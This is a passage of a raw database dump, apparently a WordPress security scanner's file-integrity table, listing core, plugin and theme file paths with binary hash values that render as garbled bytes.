Ra�uhX��c���','',0,'?'),('��&�%�a�t{����','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.gl.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�������_�}��l','m�d�[�FQ��0�\n�r.>�v{�����k','',0,'?'),('��q�o�>�L�+�c[��','wp-content/themes/nirvana/fonts/ubuntu-c-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%;��[e���q3(','�ag�!&��U�����Tcɢq�6�[}�','',0,'?'),('��r��Y#�����\"�','wp-content/themes/fabulous-fluid/images/grid-img7.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����UyI~��C&���B','s꡵����A��7�gCp��%0�Nv��K�','',0,'?'),('���e�E�����/','wp-content/plugins/spam-captcha/font-5.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q$���J��y\\','�UƠ�\n��#�GФ8��\']���f�W7H','',0,'?'),('�>4���0����Y','wp-content/plugins/dw-megamenu/lib/icon.php',0,'���D!���b�3�^','���D!���b�3�^','�����X��>����L���}bی�fg��4�;','',0,'?'),('�)[\"J�H��|�jk��$','wp-admin/js/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\,yI����D�a','৓��}�u�}@�\Z�\\,�XK��r�;7f��','',0,'?'),('�?Fϸ����A��R1�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��ԏ�d0��lN&7+','^s\n�@G,�ږ\n;|3P	nԔ/\rzA�\"\nd','',0,'?'),('�I6�S����7�.��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-image/options.php',0,'�r�R5e�j�\\)�','�r�R5e�j�\\)�','�:4.�gz��A-��ke�;3׿�n�fA|���P','',0,'?'),('�JTV0D��oTA[@�','wp-admin/options-discussion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��~�vg��3ܘ�','�lAt;��#�Tt�_�y\\S=���#:X٥j�','',0,'?'),('�O�h�f���c��\n�o�','wp-content/themes/supernews/acmethemes/hooks/social-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z?S���K_�\08x@','�޶Oc7�fz��>F8��M�y��=�G&���','',0,'?'),('�WsC����:��%U�!','wp-content/themes/hueman/assets/admin/img/footer-widgets-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Zq\"�!�}�~Ձ','2T��J(��Œ |F�y̤�6�֩e�2�f�','',0,'?'),('�e}�}�h/sP�ʚ�G�','wp-content/themes/point/css/addons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g/dͥ�(�QU���S:','j�����N�������Gy�����8�\n:ho�<','',0,'?'),('�w����J�4�f��','wp-content/themes/verbosa/admin/images/2cSr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Pop�c�(]�yi&��','Cʆ�����;�����zp�\Z�0R&�n�yj','',0,'?'),('����,d�P_(��Ez','wp-content/themes/fabulous-fluid/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�%��\r	�vrʜ��','�w�zׁ���hPh�EAF\\FyS�bN���','',0,'?'),('���-p拏Q�+3�Zv�','wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-webconfig-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�1������C6','��N+��iBa�\nA�����0��Ɉݸ���t','',0,'?'),('����S�8M�C��>��','wp-includes/js/dist/block-serialization-default-parser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߟ�ǫX�s%�{�','h-LW�Ui�p��4:\0+Q�f�.�qZ���� ��','',0,'?'),('�����dD����+P�','wp-content/themes/twentytwenty/template-parts/modal-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ct�!dr�)�j|��',')��m����9�C�$t�0�۴H��@&w�Op','',0,'?'),('��Mm�\Z���	?f��','wp-content/themes/nirvana/languages/sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ew+�� S|V�닠','�A��j������a-�Ӣ�ܓ� ��!','',0,'?'),('����-$)�8����.','wp-content/themes/fabulous-fluid/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gDص��4����','у+4WQ�0�Ƶ�������|�;�F�ա��','',0,'?'),('��x��e��\\n��5�F�','wp-content/plugins/unyson/framework/includes/option-types/background-image/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ъ\n^�8����6{','����`i�DV�b?�9��Z̘QH>���C��','',0,'?'),('����w�2�Vm��','wp-content/plugins/contact-form-7/languages/contact-form-7-ms_MY.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0�m�ᆡ�zw','�;#�y8��)�]����8K�d�p�t?��','',0,'?'),('����S�h���S�%Tz�','wp-includes/js/mediaelement/wp-mediaelement.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%/NqOR�g��+\\�','F}\Z\n��v�n�`��Z�!�T��W����s','',0,'?'),('��`�<-�j�s�ڙ��','wp-content/plugins/wordpress-seo/admin/onpage/class-onpage-request.php',0,'wf�a�??��ö�_�?','wf�a�??��ö�_�?','Z��k�y0_�d���rU���k�7z1k݄��(','',0,'?'),('��B�f����T��dm�','wp-content/themes/fluida/admin/images/3cSl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nCt	p��i���\Z��N','��Z�Q��N�#�_~��P��*P88�t�RX','',0,'?'),('��������3���k�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-dashboard-menu.php',0,'`�h����7>؜E��','`�h����7>؜E��','rR6�T�&&^��vP�ɍ)������EX;','',0,'?'),('������Y�x������','wp-content/themes/the-minimal/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P.�/*�޼䁈m��o','��]&�K����-�\n�Ԥz���B�0�#X�q','',0,'?'),('��VϺz#���m)��','wp-content/themes/twentytwenty/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Χn��*�B\"�z���0B','��_\\�]-�V|���ʓO>;��O�$�Pw�2�','',0,'?'),('��P����.���٣��','wp-content/themes/the-minimal/inc/metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���@��c��e�X','�U�r���c�m�\'��Hb�������%DDt','',0,'?'),('���0c?���g_�\"�','wp-content/plugins/unyson/framework/includes/option-types/map/static/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��\Z=g?o���P','Xȭ�y����t+nd�ؗ+(N\\׹�Z��7M,��','',0,'?'),('��)��=z+�r�u~�','wp-content/plugins/unyson/framework/static/libs/backbone-relational/backbone-relational.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;��А\nLQ�h��2|8','�1]W��!���6w\"���z�����ԍ','',0,'?'),('���\"ܒ����nzD','wp-includes/SimplePie/Caption.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܊��y�u�D\r£�','\'�W1Q�5[ۋ�)��\r�8۝5:��?*)K','',0,'?'),('���Wd�;C\r���O�','wp-content/plugins/akismet/views/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�.-Ҿ�z�<��D��','�Qǣd3ME�D��v/�Z�_a�!�/.�A1���','',0,'?'),('��ˋ�_o!\'�u��r','wp-content/plugins/wordfence/views/common/page-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)\Z���tU2Ec0\'�','�úM�..8��ѹ>Nw�j�Z����Wb��*B�','',0,'?'),('��Z\nu�oK� ��T;e','wp-admin/images/list.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��*�ӳ�S��','\\w��T[�=�b�aCk������;c���','',0,'?'),('��ll���x�L,7W�N�','wp-content/plugins/wordfence/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���\r$��o��','l�?�9Rw\"H�^�\r�s�������\ZD:�F�a','',0,'?'),('�\0wug:bȚ+����','wp-content/plugins/unyson/framework/includes/option-types/gradient/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H5 ?5��M��T���^','�m�ՀS�A�\r�|�ݚd��p����ɱ	Q�_�','',0,'?'),('�\np#֕z�S�yT~','wp-content/themes/sg-window/inc/widget-button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�>5d 1�o�]۾','�?�����r�uZ>�h�[\"/�]��Y���:$�kp','',0,'?'),('���Uy/�*%��;','wp-admin/includes/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�T���;��[��','��zk\"�M=�[��4vy�ʂ9��;0���o�m','',0,'?'),('�\rE��U���̈́��','wp-includes/images/wpspin-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('�W���P旃^q�y�','wp-content/plugins/wordfence/lib/menu_firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5X��P���K���','�S���P���A�_�l�W��2��?#_\rQ�x�','',0,'?'),('�I=bh�ʔGIkoba','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php',0,'����R�V��3�k\'�','����R�V��3�k\'�','N�.�T����v\';\'t�۬i�߄�BK�),]WYn','',0,'?'),('�1�1]PC��g4�FU=','wp-content/plugins/wordfence/js/jquery.colorbox.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(O�0%6�9�e�3�j','{�L�#�\r��]�\ngL8P,���@��Ir,{ �','',0,'?'),('�=f��u��~�','wp-content/themes/accelerate/languages/accelerate.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gB!���#Brg<','�(�G�߂�:�d�Ղ�X�6PU�L7�yB','',0,'?'),('�NR,�J�*�̦G$i�','wp-content/plugins/wordpress-seo/admin/class-option-tabs-formatter.php',0,'P�^�iZ���4��h�','P�^�iZ���4��h�','Ub�jF��/��/iꔈ��C�m=��2�Sx','',0,'?'),('�R��z��� \Z]* �','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-dir-clean.php',0,'fv�7H����S��Q�','fv�7H����S��Q�','\r{�b������%��a�b�-�����QK�083','',0,'?'),('�fn��|���P*}d','wp-content/themes/clean-magazine/inc/clean-magazine-header-highlight-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>!�	�y�6NŽ����','��&1T�I�kn՘F#}T�Y��J��_=S','',0,'?'),('�h/͔��j�C�\0�n','wp-admin/includes/class-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�pT�0$�����.�','?�t�D~#͘��/X�#G/���Nf\\��͜gN','',0,'?'),('�tK��8�����cΘk','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.lv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�ze(6X-��){��','��<�\'�S���֒`��0��OTL�h��)߆','',0,'?'),('�x�W���2e�uv�L','wp-includes/customize/class-wp-customize-background-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{f�&��E\\$�sX�','R�v3����~������|.O�L�t�N`Ѯ��','',0,'?'),('�~8dv\\^0�@F_^��','wp-content/themes/wen-business/assets/js/goto-top.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ސ��}�n;�a3�����','�����i�S��\Z ����Y T��U �Qmw','',0,'?'),('�6���?�^o�#�','wp-includes/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r-�e��r^�!�~','��`��R�lԥLz�?i�āACH�󞮣Py�n','',0,'?'),('���R	�(�,	!)�Z','wp-content/plugins/wordfence/waf/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��6��~.���S�[','��\\\'�_F�u�C)CR\"(C�O�YW�!��)','',0,'?'),('��`z|K��w�h�,�','wp-content/plugins/wordpress-seo/admin/views/tabs/social/google.php',0,'�]G�ҞKۂQ��F�','�]G�ҞKۂQ��F�','���[��#���C��xlLP҈-P8���\n=�','',0,'?'),('�����\n3�X���;','wp-content/themes/the-minimal/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z���H�̍� �)��?','\\ufe���u��2�y�ak��C���<^�','',0,'?'),('��#Qb���pҴP�H@','wp-content/themes/barletta/inc/widgets/widget-barletta-about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/ҖP����XM','T�i�\0�EzZ]#r��d$y��ž�S]_������','',0,'?'),('��K}{X��UG9<p�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�>�ᠼU��/G�@','��oyJ(B��f2H\'�h�!�\'* ɹ*��','',0,'?'),('�������݈3�+P\r','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����,0��Z%���','�g^�M���9=&*�M{��Xb�0*�u���','',0,'?'),('�����&@p����ɗ','wp-includes/js/dist/wordcount.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s K�Hd`C�!ߥ4\nb','�t%���RG؇�E\'\"J�Er�!�\'�,','',0,'?'),('�����4NA�$�P','wp-content/themes/barletta/functions.php',0,'H{�����(�6C%0�','H{�����(�6C%0�','PT��J ��@��\\�%\' �G��	�A+�y�Q','',0,'?'),('���ΦHc�^����)','wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������\'�{=ͺ','���R������_f�W{*3����ݔ	�\"�/�','',0,'?'),('������p#/�+f','wp-content/themes/nirvana/admin/images/placeholder.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�N��q����','��� �]o�Z���`_�dIK�І���if�','',0,'?'),('��s<�.S	6�!\\','wp-content/themes/hueman/assets/front/fonts/titillium-regularitalic-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2g�#� qgU�z�S~2','s���)P�m\\h|7 c��82p�kK�*�\r��;�','',0,'?'),('�ݠ�A�\"��PV�','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-digitalocean.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�c{�B��|�>���','��\n���� u��bI�&|�2��n�|�V��,�','',0,'?'),('���t��<rv�mR�','wp-content/themes/illdy/layout/images/front-page/front-page-project-4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��U�����3�BB�','x�$�u���#�_X�����G��ᤥ�°','',0,'?'),('������sp���e�','wp-admin/includes/class-wp-ms-sites-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[II�[�I#i��','<�C~��-.�\0��9q�\\��}�)���~�[$','',0,'?'),('��	�ӭgȱ!n�P�','wp-includes/IXR/class-IXR-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���J�}��!�W��','Yw��1��v.�G3e�d��Ä��y`LR	]','',0,'?'),('�t(V�\'c�)nLT�&','wp-content/themes/clean-magazine/style.css',0,'�Ͽ��F����ڍ~b','�Ͽ��F����ڍ~b','8FMgO��]:J@&�W�le>�������_9֘�','',0,'?'),('�%c�}�O�(�?R�Y<','wp-content/themes/hueman/assets/czr/css/customizer-czr-content-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lL���i�>���?','�g:��r�9��*V�_�wePm����)n�DCL��','',0,'?'),('�%�0.�B����8��','wp-content/plugins/unyson/framework/includes/option-types/typography-v2/class-fw-option-type-typography-v2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����&Y�b\0@o)	]�','$�6��vZ�s�8����35.&�dd@sԡ�','',0,'?'),('�\'�Y���&�4��','wp-content/plugins/spam-captcha/core/img/tree_vline.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_f�{#�\"N�\ZVy�',' x���r{\Z;�C�\0�r �5�sAހ��m�','',0,'?'),('�+���H\05����@','wp-content/themes/skt-construction-lite/images/icon-phone.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>(<Ӑq��1�O%RZ','O\\��\r��������\n�nQ��ӑq�i��\r�@�','',0,'?'),('�-1�8�;�T�/X�]','wp-admin/ms-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3����&S��7F76�','���,�$�y�n)R��Hg���h{�$��U��','',0,'?'),('�;ݠ�Fy�K&�\rS�	|','wp-content/themes/nirvana/fonts/sourcesanspro-semibold-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ĕ�΅@y�5\'�','�?L�~�V�9�s�E�-��L4#e��+b�cu','',0,'?'),('�=��J��o ݣV`','wp-content/themes/sg-window/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��:��(v�s[,�','^R�ec�H�u������[�L�Lט�./�9�','',0,'?'),('�F���JX���ڰ��','wp-content/themes/relia/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Js��qj���vQ','��N/� ��;�F/O=�a7i��*q\\b��N�','',0,'?'),('�I�Y	v�1BI��\'�','wp-content/plugins/wordpress-seo/admin/class-yoast-plugin-conflict.php',0,'*�9eѴ�_�-L�','*�9eѴ�_�-L�','JQ @��p4��t�	i������z\n5..�4�T','',0,'?'),('�K���4�7\'�Rh?�','wp-content/themes/twentytwenty/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qq��q�~暨u�v�','|�o�5}�G�[�=���T^��!(/�-1���B','',0,'?'),('�^\n�ɭ�J����}ݣe','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.su.php',0,'�l]p��L��O����3T','�l]p��L��O����3T','/mB�¸XN�&�iR\Z�t�bq}O�E\n\r��','',0,'?'),('�j�<M�Dd����4m�','wp-admin/includes/ms-admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�Ƽz�g�L���','��t�Mp���Q�8=��~bw����/���','',0,'?'),('�ryjJ���=� L�\0','wp-content/themes/supernews/acmethemes/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3�n|��}�%Ey�','v�6\rP\"硟�mj��5gD�j����&<�=t','',0,'?'),('�|T�&w��xz���*','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/notification/options.php',0,'�Ɨ�\"�}A0�1f��','�Ɨ�\"�}A0�1f��','0�	B��g�{�^z��TrOhR�K5Q\ZD�)�Y','',0,'?'),('��}���p�_q�(@','wp-content/plugins/unyson/framework/includes/container-types/popup/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cA,��ϣ��\'!n�T�','���Z���	��w_�1�Ƙ�/U�BH\"�8_7�','',0,'?'),('��B�\"n!UI\rk$�;I','wp-content/themes/clean-magazine/images/gallery/ads-125x125-demo.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�)YFJ�OٝШ*?�','�CQ��	�Dt1��d�Wȇ�ts3x�Y�k��','',0,'?'),('����[�f�-!Xv��','wp-content/themes/nirvana/images/socials/ShareThis.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~������qL�]��~','�r~νכa{��7y��7�/��e?����&\r','',0,'?'),('�Ρ~�ߓ�:����eo','wp-content/plugins/wordfence/images/icons/tick128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ğ��c�h4\"���','����V��}X e~G[C�峆��5������','',0,'?'),('��\'���祯S;�M|/�','wp-content/themes/travelify/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jC�J��앯)�S','�q�¾�=��TX�¾aK�y��ъ�)v8`�','',0,'?'),('�����(觨:pR�/','wp-includes/class-walker-nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��|8���~Rx�4','�P�6��^��9�hQ=�Ʉ�����A��X��','',0,'?'),('�����0��[��\\6','wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-dismissable-notice.php',0,'T�c�� 3+U?\\ i','T�c�� 3+U?\\ i',';9i L�ؙ�\r�s��}��m1���j�5q�,�','',0,'?'),('��(5�aH�yo,X�','wp-includes/js/jquery/ui/tabs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a`|��^(=`��hv','L�.X_	�DJ��tk��H��!|��ݔJ��x','',0,'?'),('��u� j0�@�F>','wp-content/plugins/unyson/framework/languages/fw-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�G��k�Jn�x���','P��uNJjz=�s��L\Z�5��ck�N�j�','',0,'?'),('�Z>�\0�cEj�k�F�','wp-content/themes/clean-magazine/inc/widgets/featured-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u���9\n�c60��+<','ژV��VN<�K�5`@B;��^F��U���I','',0,'?'),('�/7�ñ�cx��p��g','wp-content/plugins/wordfence/views/onboarding/fresh-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�c��D���o�	','|�!��^(��^�~���c��m\Z/^fŠ�[','',0,'?'),('�E2��t��\\�}�','wp-content/themes/square/inc/square-metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Mg�↉�~4f&','����=EŮ#gŸ�D̺���ogzߔI/3Kp�','',0,'?'),('���ڥ�^i�$��&','wp-content/plugins/wordfence/lib/wfCredentialsController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��\0����իw6�','7�6��ay��5�?}%.]����؞u���S�','',0,'?'),('�$�͓�bHn��,\0-','wp-includes/images/smilies/icon_confused.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/#	�Ӣww$x꾓Y','U0�\\L�X��fXƦ�G\0�T���$a�5U�B�','',0,'?'),('�-��췓��9�ExZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xw���Tg���A}�\n','�k�cQx�e�˳`=n6�X5y��dz5u]WB\'','',0,'?'),('�K�I�\rOzC���','wp-content/themes/barletta/js/dev/jquery.bxslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W���ՃkT_��','�L>}^��{�8j���C<츌������nm]','',0,'?'),('�N��ZND��N�>Y	','wp-includes/js/dist/components.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K}�*���$m�.Yp�~','+_㖜]񘟱�/)w���j�a͐O\"Y�1\\+','',0,'?'),('�{4�.������#�#','wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��ʆ�wq��F��','R�	j[�8ح͸�W����E�H��̅�a��I','',0,'?'),('��}o�����E�u	f','wp-content/themes/relia/inc/css/slicknav.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hh�֩�jqP�O���','�6�1�Vue 	��lm��HX2���ƕ+�5LA','',0,'?'),('���i�9�J0Vn=�%','wp-content/plugins/unyson/framework/extensions/backups/views/tasks-status.php',0,'P�6Z�ض�O�l���','P�6Z�ض�O�l���','�Q�`9�8[�o7��z��	|\Z����O5��','',0,'?'),('������k8Kݯ�','wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-license-manager.php',0,'{;�9�߇��L�U�qr','{;�9�߇��L�U�qr','A�b����>���2�BQ��z�b6�]���Kh','',0,'?'),('���P��$ݧ�ɍy�','wp-content/themes/skt-construction-lite/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�zSg]1�|:','d��gW�V�&R?��\\j�ƞ�Y%E���4�','',0,'?'),('����t�	I<͘l�] ','wp-content/themes/hueman/functions/czr/sections/class-widgets-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n[$���LlP�_��EЂ','��5\\\"�c�߾�5�l�9<�V{�,^w�E�','',0,'?'),('��뻛Ib�,6�Y+�8:','wp-content/themes/twentynineteen/sass/typography/_copy.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�L�ر^��#*��s','+�\\��`F���~���)?���9G�}B1��','',0,'?'),('���4ȳ�^{�~>|','wp-content/plugins/all-in-one-wp-migration/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�g]<��a���\"�','{��j�Ġ=v�q�7ق�$��E�)R`֧�','',0,'?'),('��v\'j@�-��*','wp-includes/widgets/class-wp-widget-media-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7_^\\fS�ɉ�]6n#\Z','>�@ΡD���&���{�(���Dγ����i�O#','',0,'?'),('��hxV��RVn�#D','wp-content/themes/verbosa/templates/template-onecolumn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TVW���P��\0b��(','V�id�\n/ܨ�t�X�e�Q�\'�ۺ^K6mEV`','',0,'?'),('��z|K�?�� �/.','wp-content/plugins/wordpress-seo/js/dist/wp-seo-admin-global-350.min.js',0,'9D����QN�7�;c	P','9D����QN�7�;c	P','nXӄ�Y��&\\(N/�c��rtA��^�u	��','',0,'?'),('���$��2��,�Ps�','wp-content/themes/clean-magazine/images/gallery/ads-970x125.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\"�\rb��!q,�-���','b�mpZ3.Z�)間2�8����+O<���','',0,'?'),('��_�B�c���A�X~h','wp-content/themes/illdy/layout/images/front-page/front-page-testimonial-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"��g���Pu�E',',9�n��Ž����%	��0a�\r���f','',0,'?'),('�\n]Eg���7Oq�b��','wp-includes/sitemaps/class-wp-sitemaps-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����G���o�\n�>','>��\0�B��[��Z��>�p�ޏ�a0~5k�[�G�','',0,'?'),('�3?�~��z��jO8','wp-content/plugins/wordpress-seo/admin/class-help-center-item.php',0,'�1��\0)�4��\Z','�1��\0)�4��\Z','�3�\Z(�D�d��&�*p��-��{���EǶ&�','',0,'?'),('����n��j�P�+��','wp-admin/includes/class-custom-image-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;��2g@�\\�A��','�Q6��\nd�.���V4�Ǖ���p��\Z�Ƚ��7`�','',0,'?'),('���j:���\"p�/oz','wp-content/themes/nirvana/includes/theme-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UH����ea0]���z�','�ժ���IH�h�,���7~����v�V�`,','',0,'?'),('�\Z�������Bi/6�','wp-includes/js/jquery/ui/effect-clip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']02[W�0V1�Q','�|�JR?�]ϭ̺\\T�v���� ��5t����$','',0,'?'),('�/��9�8M^���P�','wp-content/themes/morfeu/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�|��?�4�m��j','Y�}�Y�}\Z��\Z��f�xU�o/>-��և�','',0,'?'),('�0~�7bE��cgm��','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/font/servmask.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\0]�Ꭵx.5dW���',' ����o�����ZH�C����\r����Cq','',0,'?'),('�4���b��#�\\E���','wp-content/plugins/unyson/framework/core/components/extensions/manager/includes/class--fw-extensions-delete-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�K�(�\'O8��','*~����P�v\n��e��G������p','',0,'?'),('�8���C��/���Π�}','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.coop.php',0,'ʄ���4.�:��w}H','ʄ���4.�:��w}H','��H��ǨS��\n�n�o0�Z�Pc��\n��o��','',0,'?'),('�Jp-�a�\Z�Z�J��(�','wp-content/plugins/unyson/framework/static/libs/unycon/unycon.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����M}y ��s��','��g������- 